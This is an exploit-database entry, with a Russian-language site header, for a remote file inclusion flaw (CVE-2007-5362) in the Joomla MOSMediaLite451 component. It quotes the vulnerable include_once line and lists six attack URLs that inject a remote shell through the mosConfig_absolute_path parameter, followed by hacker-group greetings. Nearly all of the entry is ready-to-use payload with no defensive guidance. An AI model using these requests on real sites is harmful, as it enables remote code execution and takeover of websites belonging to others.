Exploit Joomla! Component mosmedialite451 - Remote File Inclusion

[Exploiter]

EDB-ID

4499

Проверка EDB

1. Пройдено

Автор

K1N9K0NG

Тип уязвимости

WEBAPPS

Платформа

PHP

CVE

cve-2007-5362

Дата публикации

2007-10-08

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Scripts         : MOSMediaLite451
Discovered By   : k1n9k0ng
Scripts site    : http://www.djoomla.com/component/option,com_remository/Itemid,2/func,fileinfo/id,104/
Thanks To       : #sekuritionline, #semprol, #bajingan, #mimid, #r.i.p, #x-code, #yogyafree
special To      : adhietslank, babypunk, cyberlog, cah_gemblunkz, the_sims, ARiee, letjen, k1tk4t
site            : www.sekuritionline.net
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

bug Script:
include_once( $mosConfig_absolute_path . "/administrator/components/com_mosmedia/mosmedia.config.php" );

bug found:
"http://www.site.net/administrator/components/com_mosmedia/includes/credits.html.php?mosConfig_absolute_path=[shell] "
"http://www.site.net/administrator/components/com_mosmedia/includes/info.html.php?mosConfig_absolute_path=[shell] "
"http://www.site.net/administrator/components/com_mosmedia/includes/media.divs.php?mosConfig_absolute_path=[shell] "
"http://www.site.net/administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=[shell] "
"http://www.site.net/administrator/components/com_mosmedia/includes/purchase.html.php?mosConfig_absolute_path=[shell] "
"http://www.site.net/administrator/components/com_mosmedia/includes/support.html.php?mosConfig_absolute_path=[shell] " 

# milw0rm.com [2007-10-08]